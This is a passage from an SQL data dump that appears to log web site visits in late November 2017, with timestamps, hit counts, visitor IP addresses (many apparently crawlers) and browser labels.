76','other'),(181924,1511726086,4,4,0,0,'46.229.168.67','other'),(181925,1511726117,5,5,0,0,'46.229.168.71','other'),(181926,1511726249,3,3,0,0,'35.184.189.105','other'),(181927,1511726409,9,9,0,0,'46.229.168.69','other'),(181928,1511726428,6,6,0,0,'46.229.168.77','other'),(181929,1511726512,8,8,0,0,'46.229.168.68','other'),(181930,1511726608,5,5,0,0,'46.229.168.78','other'),(181931,1511726614,1,1,0,0,'95.67.80.108','chrome'),(181932,1511726672,1,1,0,0,'51.255.65.78','other'),(181933,1511726843,1,1,0,0,'157.55.39.94','other'),(181934,1511726860,12,12,0,0,'46.229.168.75','other'),(181935,1511726901,3,3,0,0,'46.229.168.74','other'),(181936,1511726903,2,2,0,0,'46.229.168.72','other'),(181937,1511726965,4,4,0,0,'46.229.168.80','other'),(181938,1511726984,3,3,0,0,'46.229.168.66','other'),(181939,1511727051,1,1,0,0,'216.244.66.237','other'),(181940,1511727073,6,6,0,0,'46.229.168.76','other'),(181941,1511727096,1,1,0,0,'51.255.65.91','other'),(181942,1511727101,4,4,0,0,'46.229.168.67','other'),(181943,1511727178,2,2,0,0,'46.229.168.79','other'),(181944,1511727230,4,4,0,0,'46.229.168.73','other'),(181945,1511727286,1,1,0,0,'91.196.178.42','chrome'),(181946,1511727410,3,3,0,0,'46.229.168.65','other'),(181947,1511727453,4,4,0,0,'46.229.168.68','other'),(181948,1511727485,3,3,0,0,'46.229.168.70','other'),(181949,1511727545,1,1,0,0,'46.48.13.161','chrome'),(181950,1511727645,2,2,0,0,'46.229.168.77','other'),(181951,1511727654,1,1,0,0,'46.229.168.69','other'),(181952,1511728057,1,1,0,0,'46.101.16.232','chrome'),(181953,1511728598,1,1,0,0,'141.8.142.74','other'),(181954,1511729436,1,1,0,0,'164.132.162.188','other'),(181955,1511730061,1,1,0,0,'216.244.66.237','other'),(181956,1511730507,1,1,0,0,'91.196.178.100','chrome'),(181957,1511730877,1,1,0,0,'8.29.198.26','other'),(181958,1511730938,1,1,0,0,'51.255.65.81','other'),(181959,1511731581,1,1,0,0,'40.77.167.124','other'),(181960,1511733172,1,1,0,0,'217.182.132.185','other'),(181961,1511733176,2,2,0,0,'216.244.66.237','other'),(181962,1511733263,1,1,0,0,'217.182.132.240','other'),(181963,1511733430,1,1,0,0,'217.182.132.36','other'),(181964,1511733766,1,1,0,0,'217.182.132.82','other'),(181965,1511734043,1,1,0,0,'35.184.189.105','other'),(181966,1511734269,1,1,0,0,'51.255.65.19','other'),(181967,1511734434,1,1,0,0,'51.255.71.101','other'),(181968,1511734546,1,1,0,0,'216.244.66.237','other'),(181969,1511735180,1,1,0,0,'51.255.65.32','other'),(181970,1511735248,1,1,0,0,'188.32.240.149','chrome'),(181971,1511735481,1,1,0,0,'164.132.162.157','other'),(181972,1511735601,1,1,0,0,'51.255.65.37','other'),(181973,1511736158,1,1,0,0,'51.255.65.80','other'),(181974,1511736206,1,1,0,0,'93.78.109.157','chrome'),(181975,1511736264,1,1,0,0,'178.154.171.88','other'),(181976,1511736850,1,1,0,0,'40.77.167.124','other'),(181977,1511737129,1,1,0,0,'51.255.65.69','other'),(181978,1511737868,1,1,0,0,'216.244.66.237','other'),(181979,1511738020,1,1,0,0,'51.255.65.82','other'),(181980,1511738109,1,1,0,0,'51.255.65.93','other'),(181981,1511738371,1,1,0,0,'51.255.71.128','other'),(181982,1511738472,1,1,0,0,'51.255.71.111','other'),(181983,1511738608,5,5,0,0,'141.8.142.74','other'),(181984,1511739276,1,1,0,0,'178.154.171.88','other'),(181985,1511739324,2,2,0,0,'216.244.66.237','other'),(181986,1511739553,1,1,0,0,'217.182.132.240','other'),(181987,1511739585,3,3,0,0,'35.184.189.105','other'),(181988,1511740052,1,1,0,0,'141.8.142.74','other'),(181989,1511740127,1,1,0,0,'217.182.132.33','other'),(181990,1511740143,1,0,1,0,'66.249.66.75',''),(181991,1511740386,1,1,0,0,'217.182.132.53','other'),(181992,1511740531,2,2,0,0,'35.184.189.105','other'),(181993,1511740787,1,1,0,0,'217.182.132.183','other'),(181994,1511740994,1,1,0,0,'164.132.162.160','other'),(181995,1511741080,1,1,0,0,'178.154.171.88','other'),(181996,1511741133,1,1,0,0,'217.182.132.173','other'),(181997,1511741550,1,1,0,0,'51.255.65.92','other'),(181998,1511741691,1,1,0,0,'51.255.65.59','other'),(181999,1511741722,1,1,0,0,'8.29.198.25','other'),(182000,1511741767,1,1,0,0,'40.77.167.12','other'),(182001,1511741977,1,1,0,0,'141.8.142.74','other'),(182002,1511742174,2,2,0,0,'216.244.66.237','other'),(182003,1511743646,1,1,0,0,'216.244.66.237','other'),(182004,1511743649,1,1,0,0,'217.182.132.82','other'),(182005,1511743684,1,1,0,0,'51.255.65.13','other'),(182006,1511744077,3,3,0,0,'141.8.142.74','other'),(182007,1511744306,1,1,0,0,'217.182.132.19','other'),(182008,1511744460,1,1,0,0,'51.255.65.23','other'),(182009,1511744673,1,1,0,0,'217.182.132.186','other'),(182010,1511744858,1,1,0,0,'217.182.132.79','other'),(182011,1511744977,1,1,0,0,'216.244.66.237','other'),(182012,1511746162,1,1,0,0,'35.184.189.105','other'),(182013,1511746753,1,1,0,0,'217.182.132.7','other'),(182014,1511746811,1,1,0,0,'178.154.171.88','other'),(182015,1511746900,1,0,1,0,'66.249.66.76',''),(182016,1511747162,1,1,0,0,'37.9.113.182','other'),(182017,1511747214,1,1,0,0,'51.255.71.120','other'),(182018,1511747395,1,1,0,0,'217.182.132.92','other'),(182019,1511747467,1,1,0,0,'87.250.224.46','other'),(182020,1511747486,1,1,0,0,'37.9.113.157','other'),(182021,1511747791,2,2,0,0,'216.244.66.237','other'),(182022,1511747903,1,1,0,0,'51.255.65.11','other'),(182023,1511748118,1,1,0,0,'51.255.65.30','other'),(182024,1511748329,1,1,0,0,'87.250.224.66','other'),(182025,1511748332,1,1,0,0,'213.180.203.7','other'),(182026,1511748434,1,1,0,0,'217.182.132.193','other'),(182027,1511748609,1,1,0,0,'207.46.13.143','other'),(182028,1511748725,69,69,0,0,'94.199.151.22','other'),(182029,1511749100,1,1,0,0,'216.244.66.237','other'),(182030,1511749724,1,1,0,0,'51.255.71.128','other'),(182031,1511749978,1,1,0,0,'40.77.167.118','other'),(182032,1511750468,2,2,0,0,'216.244.66.237','other'),(182033,1511751297,1,1,0,0,'217.182.132.21','other'),(182034,1511751448,1,1,0,0,'37.9.113.151','other'),(182035,1511751484,1,1,0,0,'66.249.66.76','chrome'),(182036,1511751529,1,1,0,0,'66.249.66.155','chrome'),(182037,1511751563,1,1,0,0,'40.77.167.118','other'),(182038,1511751738,1,1,0,0,'217.182.132.182','other'),(182039,1511751895,1,1,0,0,'216.244.66.237','other'),(182040,1511752010,1,1,0,0,'51.255.71.128','other'),(182041,1511752380,1,1,0,0,'51.255.71.122','other'),(182042,1511752393,1,1,0,0,'51.255.71.131','other'),(182043,1511752558,1,1,0,0,'8.29.198.27','other'),(182044,1511752668,3,3,0,0,'35.184.189.105','other'),(182045,1511752737,1,1,0,0,'51.255.65.91','other'),(182046,1511752833,1,0,1,0,'66.249.66.157',''),(182047,1511753036,1,1,0,0,'207.46.13.143','other'),(182048,1511753229,1,1,0,0,'216.244.66.237','other'),(182049,1511753350,1,1,0,0,'40.77.167.54','other'),(182050,1511753908,1,1,0,0,'217.182.132.61','other'),(182051,1511753937,1,1,0,0,'141.8.142.74','other'),(182052,1511754452,1,1,0,0,'217.182.132.66','other'),(182053,1511754461,1,1,0,0,'217.182.132.185','other'),(182054,1511754500,1,0,1,0,'66.249.66.155',''),(182055,1511754521,1,1,0,0,'216.244.66.237','other'),(182056,1511754983,2,2,0,0,'207.46.13.143','other'),(182057,1511755038,1,1,0,0,'217.182.132.63','other'),(182058,1511755065,2,2,0,0,'35.184.189.105','other'),(182059,1511755094,1,1,0,0,'217.182.132.150','other'),(182060,1511755875,1,1,0,0,'216.244.66.237','other'),(182061,1511756054,1,0,1,0,'66.249.66.75',''),(182062,1511756130,1,1,0,0,'51.255.65.224','other'),(182063,1511756773,1,1,0,0,'217.182.132.22','other'),(182064,1511757354,1,1,0,0,'217.182.132.19','other'),(182065,1511757360,1,1,0,0,'51.255.71.125','other'),(182066,1511757783,1,1,0,0,'164.132.162.156','other'),(182067,1511758321,1,1,0,0,'51.255.71.127','other'),(182068,1511758652,1,1,0,0,'137.74.207.108','other'),(182069,1511758703,1,1,0,0,'51.255.65.18','other'),(182070,1511758932,2,2,0,0,'216.244.66.237','other'),(182071,1511759191,1,1,0,0,'51.255.65.30','other'),(182072,1511759375,1,1,0,0,'51.255.71.132','other'),(182073,1511759859,1,1,0,0,'217.182.132.95','other'),(182074,1511760229,1,1,0,0,'51.255.71.125','other'),(182075,1511760492,1,1,0,0,'216.244.66.237','other'),(182076,1511760805,1,1,0,0,'51.255.65.73','other'),(182077,1511760872,1,1,0,0,'51.255.65.75','other'),(182078,1511761321,1,1,0,0,'40.77.167.124','other'),(182079,1511761588,2,2,0,0,'95.132.97.191','other'),(182080,1511761804,2,2,0,0,'216.244.66.237','other'),(182081,1511761869,2,0,2,0,'66.249.66.155',''),(182082,1511762016,1,1,0,0,'217.182.132.56','other'),(182083,1511762104,1,0,1,0,'66.249.66.156',''),(182084,1511762124,1,1,0,0,'217.182.132.29','other'),(182085,1511762839,1,1,0,0,'91.196.178.72','firefox'),(182086,1511763098,1,1,0,0,'216.244.66.237','other'),(182087,1511763218,1,1,0,0,'51.255.65.53','other'),(182088,1511763281,1,0,1,0,'66.249.66.157',''),(182089,1511763389,1,1,0,0,'8.29.198.27','other'),(182090,1511763857,1,1,0,0,'217.182.132.61','other'),(182091,1511763915,1,1,0,0,'51.255.65.73','other'),(182092,1511763962,1,1,0,0,'164.132.162.155','other'),(182093,1511764284,1,1,0,0,'51.255.65.81','other'),(182094,1511764342,2,2,0,0,'216.244.66.237','other'),(182095,1511764434,1,1,0,0,'51.255.65.26','other'),(182096,1511764484,1,1,0,0,'195.225.147.30','chrome'),(182097,1511764728,1,0,1,0,'66.249.66.155',''),(182098,1511764829,1,1,0,0,'164.132.162.156','other'),(182099,1511764930,1,1,0,0,'37.204.67.122','msie'),(182100,1511765025,1,1,0,0,'217.182.132.241','other'),(182101,1511765209,1,1,0,0,'137.74.207.101','other'),(182102,1511765232,1,1,0,0,'141.8.142.74','other'),(182103,1511765368,1,0,1,0,'66.249.66.156',''),(182104,1511765403,1,1,0,0,'91.196.178.65','chrome'),(182105,1511765687,2,2,0,0,'216.244.66.237','other'),(182106,1511765734,1,0,1,0,'66.249.66.75',''),(182107,1511765986,1,1,0,0,'51.255.65.80','other'),(182108,1511766214,1,1,0,0,'195.230.119.34','chrome'),(182109,1511766352,1,1,0,0,'217.182.132.22','other'),(182110,1511766410,1,1,0,0,'217.182.132.156','other'),(182111,1511766869,1,1,0,0,'51.255.71.112','other'),(182112,1511766976,1,1,0,0,'195.10.210.70','chrome'),(182113,1511767037,4,4,0,0,'216.244.66.237','other'),(182114,1511767506,1,0,1,0,'66.249.66.155',''),(182115,1511767579,1,1,0,0,'91.196.178.65','chrome'),(182116,1511767645,1,1,0,0,'137.74.207.102','other'),(182117,1511767842,1,1,0,0,'91.196.178.70','firefox'),(182118,1511767991,1,1,0,0,'51.255.65.47','other'),(182119,1511768098,1,1,0,0,'188.163.16.6','chrome'),(182120,1511768409,1,1,0,0,'217.182.132.16','other'),(182121,1511768433,1,1,0,0,'51.255.65.84','other'),(182122,1511768460,1,1,0,0,'95.79.87.73','chrome'),(182123,1511768823,1,1,0,0,'217.182.132.94','other'),(182124,1511769080,1,1,0,0,'51.255.65.40','other'),(182125,1511769291,1,1,0,0,'45.32.146.13','firefox'),(182126,1511769292,1,1,0,0,'45.32.146.13','other'),(182127,1511769542,1,1,0,0,'37.9.113.182','other'),(182128,1511769581,1,1,0,0,'217.182.132.149','other'),(182129,1511769754,1,1,0,0,'91.196.178.72','chrome'),(182130,1511769896,2,2,0,0,'216.244.66.237','other'),(182131,1511769972,1,1,0,0,'217.182.132.31','other'),(182132,1511770738,1,1,0,0,'91.196.178.70','firefox'),(182133,1511770776,2,2,0,0,'95.213.141.126','opera'),(182134,1511770808,2,2,0,0,'141.8.142.74','other'),(182135,1511770956,1,1,0,0,'91.196.177.46','chrome'),(182136,1511771495,1,1,0,0,'51.255.65.25','other'),(182137,1511771664,1,0,1,0,'66.249.66.75',''),(182138,1511771792,1,1,0,0,'164.132.162.160','other'),(182139,1511772030,1,1,0,0,'37.9.113.101','other'),(182140,1511772068,1,1,0,0,'92.113.0.222','chrome'),(182141,1511772304,2,2,0,0,'35.184.189.105','other'),(182142,1511772311,1,1,0,0,'217.182.132.25','other'),(182143,1511772437,1,1,0,0,'31.43.17.19','chrome'),(182144,1511772466,1,1,0,0,'188.166.71.186','chrome'),(182145,1511772599,1,1,0,0,'216.244.66.237','other'),(182146,1511772699,1,1,0,0,'46.200.196.129','firefox'),(182147,1511772747,1,1,0,0,'217.182.132.67','other'),(182148,1511772925,1,1,0,0,'91.196.178.135','firefox'),(182149,1511773134,1,1,0,0,'51.255.65.35','other'),(182150,1511773896,1,1,0,0,'141.8.142.74','other'),(182151,1511774063,3,3,0,0,'216.244.66.237','other'),(182152,1511774222,1,1,0,0,'8.29.198.25','other'),(182153,1511774355,1,1,0,0,'46.255.33.218','chrome'),(182154,1511775299,2,0,2,0,'66.249.66.155',''),(182155,1511775525,3,3,0,0,'216.244.66.237','other'),(182156,1511776425,1,1,0,0,'46.200.112.105','firefox'),(182157,1511776433,1,1,0,0,'95.135.90.10','chrome'),(182158,1511776861,1,1,0,0,'216.244.66.237','other'),(182159,1511776909,1,1,0,0,'78.111.185.193','chrome'),(182160,1511777380,1,1,0,0,'82.145.221.176','chrome'),(182161,1511777407,2,0,2,0,'66.249.66.81',''),(182162,1511777412,1,1,0,0,'37.53.229.73','chrome'),(182163,1511777419,1,1,0,0,'178.95.24.158','chrome'),(182164,1511777505,2,2,0,0,'178.154.171.24','other'),(182165,1511777590,2,2,0,0,'37.9.113.186','other'),(182166,1511777594,1,1,0,0,'5.45.207.69','other'),(182167,1511777597,1,1,0,0,'37.9.113.56','other'),(182168,1511777600,1,1,0,0,'5.45.207.83','other'),(182169,1511777604,1,1,0,0,'95.108.181.111','other'),(182170,1511777863,1,1,0,0,'31.41.70.3','chrome'),(182171,1511778055,1,1,0,0,'185.84.148.4','other'),(182172,1511778349,1,1,0,0,'216.244.66.237','other'),(182173,1511778370,1,1,0,0,'91.196.178.72','chrome'),(182174,1511778817,1,1,0,0,'40.77.167.124','other'),(182175,1511779370,1,0,1,0,'66.249.66.157',''),(182176,1511779406,1,1,0,0,'37.9.113.82','other'),(182177,1511779485,1,1,0,0,'5.45.207.69','other'),(182178,1511780062,1,1,0,0,'91.196.177.15','chrome'),(182179,1511780251,1,1,0,0,'46.174.125.28','chrome'),(182180,1511780750,1,1,0,0,'35.184.189.105','other'),(182181,1511780768,1,1,0,0,'51.255.71.132','other'),(182182,1511780770,1,0,1,0,'66.249.66.157',''),(182183,1511781156,1,1,0,0,'217.182.132.60','other'),(182184,1511781305,1,1,0,0,'217.182.132.20','other'),(182185,1511781446,1,1,0,0,'178.255.215.94','other'),(182186,1511781633,1,1,0,0,'51.255.65.69','other'),(182187,1511782431,1,1,0,0,'82.207.91.234','other'),(182188,1511782447,1,1,0,0,'217.182.132.178','other'),(182189,1511782800,4,4,0,0,'216.244.66.237','other'),(182190,1511782843,1,1,0,0,'157.55.39.126','other'),(182191,1511783233,1,0,1,0,'66.249.66.157',''),(182192,1511783287,1,1,0,0,'217.182.132.182','other'),(182193,1511783626,1,1,0,0,'164.132.162.154','other'),(182194,1511784155,1,1,0,0,'91.196.178.164','chrome'),(182195,1511784243,1,1,0,0,'207.46.13.143','other'),(182196,1511784248,1,1,0,0,'216.244.66.237','other'),(182197,1511784576,1,1,0,0,'35.184.189.105','other'),(182198,1511784755,1,1,0,0,'217.182.132.152','other'),(182199,1511784841,1,0,1,0,'66.249.66.80',''),(182200,1511785060,1,1,0,0,'8.29.198.27','other'),(182201,1511785314,1,1,0,0,'46.48.13.161','chrome'),(182202,1511785882,1,1,0,0,'91.196.178.23','chrome'),(182203,1511786189,1,1,0,0,'40.77.167.124','other'),(182204,1511786242,1,1,0,0,'91.196.177.46','chrome'),(182205,1511786364,1,1,0,0,'217.182.132.179','other'),(182206,1511786419,1,1,0,0,'91.196.178.71','chrome'),(182207,1511786654,1,1,0,0,'66.249.66.80','chrome'),(182208,1511786858,3,3,0,0,'216.244.66.237','other'),(182209,1511787038,1,1,0,0,'91.196.178.72','chrome'),(182210,1511787962,1,1,0,0,'217.182.132.83','other'),(182211,1511788233,9,9,0,0,'81.109.85.9','other'),(182212,1511788311,1,0,1,0,'66.249.66.157',''),(182213,1511788505,1,1,0,0,'46.174.163.134','chrome'),(182214,1511788560,1,1,0,0,'217.182.132.240','other'),(182215,1511788990,1,1,0,0,'217.182.132.60','other'),(182216,1511789285,1,1,0,0,'93.74.212.147','firefox'),(182217,1511789906,1,1,0,0,'216.244.66.237','other'),(182218,1511789914,1,0,1,0,'66.249.66.157',''),(182219,1511790267,1,1,0,0,'217.182.132.60','other'),(182220,1511790557,1,1,0,0,'217.182.132.24','other'),(182221,1511791425,1,1,0,0,'217.182.132.17','other'),(182222,1511791523,1,1,0,0,'217.182.132.84','other'),(182223,1511791648,1,1,0,0,'51.255.65.69','other'),(182224,1511792093,1,0,1,0,'66.249.66.156',''),(182225,1511792267,1,1,0,0,'91.196.178.71','chrome'),(182226,1511792282,1,1,0,0,'176.103.8.25','chrome'),(182227,1511792568,1,1,0,0,'216.244.66.237','other'),(182228,1511792727,1,1,0,0,'207.46.13.114','other'),(182229,1511793118,1,1,0,0,'51.255.71.130','other'),(182230,1511793149,1,1,0,0,'128.72.45.78','chrome'),(182231,1511793253,1,1,0,0,'51.255.71.100','other'),(182232,1511793540,1,1,0,0,'91.196.178.104','chrome'),(182233,1511794090,1,1,0,0,'91.196.178.65','chrome'),(182234,1511794145,1,1,0,0,'66.249.66.156','chrome'),(182235,1511794148,1,1,0,0,'66.249.66.81','chrome'),(182236,1511794467,1,0,1,0,'66.249.66.155',''),(182237,1511795282,3,3,0,0,'24.89.192.155','other'),(182238,1511795362,2,2,0,0,'216.244.66.237','other'),(182239,1511795404,1,1,0,0,'217.182.132.19','other'),(182240,1511795583,1,1,0,0,'51.255.71.100','other'),(182241,1511795634,3,3,0,0,'35.184.189.105','other'),(182242,1511795781,1,1,0,0,'164.132.162.160','other'),(182243,1511795861,1,1,0,0,'37.52.17.192','chrome'),(182244,1511795905,1,1,0,0,'8.29.198.25','other'),(182245,1511795935,1,1,0,0,'66.249.66.81','chrome'),(182246,1511795945,1,1,0,0,'66.249.66.155','chrome'),(182247,1511796323,2,0,2,0,'66.249.66.157',''),(182248,1511796324,1,1,0,0,'51.255.65.80','other'),(182249,1511796778,1,1,0,0,'207.46.13.143','other'),(182250,1511796790,1,1,0,0,'216.244.66.237','other'),(182251,1511796861,1,1,0,0,'51.255.71.111','other'),(182252,1511797013,2,0,2,0,'66.249.66.155',''),(182253,1511798134,1,1,0,0,'51.255.65.45','other'),(182254,1511798190,1,1,0,0,'164.132.162.158','other'),(182255,1511798560,1,0,1,0,'66.249.66.155',''),(182256,1511798882,1,1,0,0,'217.182.132.51','other'),(182257,1511799249,1,1,0,0,'107.167.108.182','chrome'),(182258,1511799765,1,0,1,0,'66.249.66.155',''),(182259,1511799928,1,0,1,0,'66.249.66.157',''),(182260,1511800064,1,1,0,0,'207.46.13.143','other'),(182261,1511800096,1,1,0,0,'91.196.177.46','chrome'),(182262,1511800376,1,1,0,0,'217.182.132.32','other'),(182263,1511801093,1,0,1,0,'66.249.66.157',''),(182264,1511801367,1,1,0,0,'51.255.65.90','other'),(182265,1511801510,2,0,2,0,'66.249.66.155',''),(182266,1511801631,1,1,0,0,'35.184.189.105','other'),(182267,1511801768,1,1,0,0,'40.77.167.124','other'),(182268,1511801866,1,1,0,0,'217.182.132.72','other'),(182269,1511802557,2,2,0,0,'216.244.66.237','other'),(182270,1511802938,2,2,0,0,'207.46.13.114','other'),(182271,1511803034,1,1,0,0,'66.249.66.157','chrome'),(182272,1511803782,1,1,0,0,'217.182.132.19','other'),(182273,1511803979,1,1,0,0,'217.182.132.154','other'),(182274,1511804014,1,1,0,0,'81.23.24.136','chrome'),(182275,1511804142,1,0,1,0,'66.249.66.156',''),(182276,1511804448,1,1,0,0,'164.132.162.164','other'),(182277,1511804540,1,1,0,0,'51.255.65.88','other'),(182278,1511804704,1,1,0,0,'51.255.71.116','other'),(182279,1511804720,1,0,1,0,'66.249.66.157',''),(182280,1511804831,1,1,0,0,'35.184.189.105','other'),(182281,1511804837,1,1,0,0,'199.58.86.209','other'),(182282,1511805227,1,1,0,0,'216.244.66.237','other'),(182283,1511805337,1,0,1,0,'66.249.66.156',''),(182284,1511805454,1,1,0,0,'217.182.132.32','other'),(182285,1511805944,1,1,0,0,'178.154.171.10','other'),(182286,1511806019,1,1,0,0,'95.132.37.15','firefox'),(182287,1511806326,1,1,0,0,'51.255.71.132','other'),(182288,1511806499,1,1,0,0,'91.196.178.67','firefox'),(182289,1511806611,1,1,0,0,'51.255.65.59','other'),(182290,1511806676,1,1,0,0,'51.255.65.52','other'),(182291,1511806739,1,1,0,0,'51.255.71.130','other'),(182292,1511806741,1,1,0,0,'8.29.198.27','other'),(182293,1511807189,1,0,1,0,'66.249.66.157',''),(182294,1511807662,1,1,0,0,'217.182.132.35','other'),(182295,1511807747,1,1,0,0,'217.182.132.175','other'),(182296,1511807805,1,1,0,0,'40.77.167.124','other'),(182297,1511807809,1,1,0,0,'91.196.178.54','chrome'),(182298,1511808055,1,0,1,0,'66.249.66.156',''),(182299,1511808111,1,1,0,0,'51.255.65.74','other'),(182300,1511808166,4,4,0,0,'216.244.66.237','other'),(182301,1511808369,1,1,0,0,'37.190.163.241','chrome'),(182302,1511808375,1,1,0,0,'51.255.65.43','other'),(182303,1511808426,1,1,0,0,'51.255.65.34','other'),(182304,1511808857,1,1,0,0,'66.249.66.81','chrome'),(182305,1511808937,2,1,1,0,'66.249.66.157',''),(182306,1511809567,1,1,0,0,'217.182.132.187','other'),(182307,1511810188,1,1,0,0,'51.255.65.31','other'),(182308,1511810480,1,1,0,0,'137.74.207.108','other'),(182309,1511811117,1,1,0,0,'217.182.132.30','other'),(182310,1511811265,1,1,0,0,'207.46.13.143','other'),(182311,1511811674,2,1,1,0,'66.249.66.155',''),(182312,1511812196,1,1,0,0,'51.255.65.97','other'),(182313,1511812410,1,1,0,0,'217.182.132.33','other'),(182314,1511812485,1,0,1,0,'66.249.66.156',''),(182315,1511812506,1,0,1,0,'66.249.66.75',''),(182316,1511813177,1,1,0,0,'94.179.153.81','chrome'),(182317,1511813258,1,1,0,0,'217.182.132.31','other'),(182318,1511813319,1,1,0,0,'217.182.132.190','other'),(182319,1511813545,1,1,0,0,'51.255.65.44','other'),(182320,1511813631,1,0,1,0,'68.180.229.52',''),(182321,1511813661,1,1,0,0,'91.196.178.168','chrome'),(182322,1511813662,1,1,0,0,'51.255.65.57','other'),(182323,1511814115,1,1,0,0,'217.182.132.69','other'),(182324,1511814133,1,1,0,0,'51.255.65.65','other'),(182325,1511814226,1,1,0,0,'35.184.189.105','other'),(182326,1511814346,1,1,0,0,'51.255.71.125','other'),(182327,1511815389,1,1,0,0,'217.182.132.27','other'),(182328,1511815775,1,1,0,0,'51.255.71.112','other'),(182329,1511816118,1,1,0,0,'199.30.25.28','other'),(182330,1511816743,1,1,0,0,'217.182.132.240','other'),(182331,1511816797,1,0,1,0,'66.249.64.29',''),(182332,1511816860,1,1,0,0,'66.249.70.29','chrome'),(182333,1511816922,1,1,0,0,'66.249.64.29','chrome'),(182334,1511817266,1,1,0,0,'51.255.65.26','other'),(182335,1511817481,1,1,0,0,'51.255.65.83','other'),(182336,1511817525,1,1,0,0,'207.46.13.143','other'),(182337,1511817572,1,1,0,0,'51.255.65.14','other'),(182338,1511817584,1,1,0,0,'8.29.198.26','other'),(182339,1511818189,1,1,0,0,'141.8.142.74','other'),(182340,1511818406,1,1,0,0,'51.255.65.52','other'),(182341,1511818839,1,1,0,0,'51.255.65.70','other'),(182342,1511819154,1,0,1,0,'66.249.70.25',''),(182343,1511819267,1,1,0,0,'91.209.11.236','other'),(182344,1511819713,1,1,0,0,'51.255.65.86','other'),(182345,1511820031,1,1,0,0,'217.182.132.59','other'),(182346,1511820174,1,1,0,0,'66.249.64.30','chrome'),(182347,1511820547,1,1,0,0,'51.255.71.113','other'),(182348,1511821063,2,2,0,0,'141.8.142.74','other'),(182349,1511821449,1,1,0,0,'51.255.65.18','other'),(182351,1511821723,4,4,0,0,'208.110.93.78','other'),(182352,1511821899,1,0,1,0,'66.249.70.27',''),(182353,1511822291,1,1,0,0,'31.135.83.9','msie'),(182354,1511822656,1,1,0,0,'217.182.132.33','other'),(182355,1511822674,1,1,0,0,'51.255.71.110','other'),(182356,1511824084,1,0,1,0,'66.249.70.29',''),(182357,1511824183,1,1,0,0,'51.255.65.34','other'),(182358,1511824206,1,1,0,0,'217.182.132.192','other'),(182360,1511824233,1,1,0,0,'216.244.66.237','other'),(182361,1511824724,1,1,0,0,'178.154.171.60','other'),(182362,1511826103,1,1,0,0,'207.46.13.143','other'),(182363,1511826109,1,1,0,0,'51.255.71.122','other'),(182364,1511826438,1,1,0,0,'51.255.71.115','other'),(182365,1511826517,1,1,0,0,'66.249.70.25','chrome'),(182366,1511826529,1,1,0,0,'66.249.64.28','chrome'),(182367,1511826606,1,1,0,0,'141.8.142.74','other'),(182368,1511827535,1,1,0,0,'217.182.132.55','other'),(182369,1511828425,1,1,0,0,'8.29.198.27','other'),(182370,1511828479,1,1,0,0,'66.249.64.29','chrome'),(182371,1511828753,1,1,0,0,'178.127.37.123','firefox'),(182372,1511829078,1,1,0,0,'51.255.65.86','other'),(182373,1511829601,1,1,0,0,'216.244.66.237','other'),(182374,1511830373,1,1,0,0,'40.77.167.124','other'),(182375,1511831266,1,1,0,0,'217.182.132.16','other'),(182376,1511831452,1,1,0,0,'217.182.132.61','other'),(182377,1511831531,1,1,0,0,'51.255.65.79','other'),(182378,1511831845,1,1,0,0,'180.76.15.12','other'),(182379,1511832640,1,1,0,0,'178.154.171.88','other'),(182380,1511832782,1,1,0,0,'217.182.132.184','other'),(182381,1511833117,1,1,0,0,'51.255.71.122','other'),(182382,1511833222,1,1,0,0,'51.255.65.89','other'),(182383,1511833255,1,1,0,0,'217.182.132.87','other'),(182384,1511833714,1,1,0,0,'51.255.65.12','other'),(182385,1511833965,1,1,0,0,'164.132.162.188','other'),(182386,1511834358,1,1,0,0,'51.255.71.127','other'),(182387,1511834964,1,1,0,0,'178.154.171.88','other'),(182388,1511835129,2,2,0,0,'141.8.142.74','other'),(182389,1511835768,1,1,0,0,'51.255.65.38','other'),(182390,1511835788,1,1,0,0,'51.255.65.59','other'),(182391,1511835972,1,1,0,0,'207.244.157.138','chrome'),(182392,1511836118,1,1,0,0,'217.182.132.20','other'),(182393,1511836212,1,1,0,0,'51.255.71.100','other'),(182394,1511836524,1,1,0,0,'51.255.65.24','other'),(182395,1511836585,1,0,1,0,'66.249.64.30',''),(182396,1511836725,1,1,0,0,'51.255.65.28','other'),(182397,1511837022,2,2,0,0,'66.249.64.29','chrome'),(182398,1511837171,1,1,0,0,'217.182.132.61','other'),(182399,1511837297,1,1,0,0,'216.244.66.237','other'),(182400,1511837860,1,1,0,0,'217.182.132.73','other'),(182401,1511838091,1,1,0,0,'217.182.132.50','other'),(182402,1511838169,1,1,0,0,'66.249.64.30','chrome'),(182403,1511838239,1,1,0,0,'217.182.132.181','other'),(182404,1511838642,1,1,0,0,'66.249.70.29','chrome'),(182405,1511838661,1,1,0,0,'217.182.132.86','other'),(182406,1511838811,1,1,0,0,'5.45.207.49','other'),(182407,1511838828,1,1,0,0,'178.154.171.55','other'),(182408,1511839268,1,1,0,0,'8.29.198.25','other'),(182409,1511839446,1,1,0,0,'51.255.71.131','other'),(182410,1511839483,1,1,0,0,'217.182.132.148','other'),(182411,1511839863,1,1,0,0,'40.77.167.124','other'),(182412,1511839900,1,1,0,0,'216.244.66.237','other'),(182413,1511840298,1,1,0,0,'217.182.132.92','other'),(182414,1511840326,1,1,0,0,'51.255.71.133','other'),(182415,1511840504,1,1,0,0,'217.182.132.69','other'),(182416,1511840705,1,1,0,0,'217.182.132.183','other'),(182417,1511840749,1,1,0,0,'217.182.132.146','other'),(182418,1511840911,1,1,0,0,'87.250.224.46','other'),(182419,1511841139,1,1,0,0,'137.74.201.100','other'),(182420,1511841417,1,1,0,0,'66.249.64.29','chrome'),(182421,1511841460,1,1,0,0,'37.9.113.182','other'),(182422,1511841471,1,1,0,0,'37.9.113.101','other'),(182423,1511841713,1,1,0,0,'141.8.142.74','other'),(182424,1511841775,1,0,1,0,'66.249.70.25',''),(182425,1511841913,1,1,0,0,'141.8.132.19','other'),(182426,1511841975,1,1,0,0,'137.74.207.114','other'),(182427,1511842424,1,1,0,0,'51.255.65.95','other'),(182428,1511842761,1,1,0,0,'217.182.132.33','other'),(182429,1511842995,1,1,0,0,'51.255.65.54','other'),(182430,1511843075,1,1,0,0,'137.74.207.114','other'),(182431,1511843472,1,1,0,0,'180.76.15.30','other'),(182432,1511843561,1,1,0,0,'217.182.132.63','other'),(182433,1511843711,1,1,0,0,'51.255.65.47','other'),(182434,1511843898,1,1,0,0,'51.255.65.61','other'),(182435,1511843914,2,2,0,0,'178.154.171.88','other'),(182436,1511844671,2,0,2,0,'66.249.64.28',''),(182437,1511844736,1,1,0,0,'141.8.132.19','other'),(182438,1511845197,1,1,0,0,'216.244.66.237','other'),(1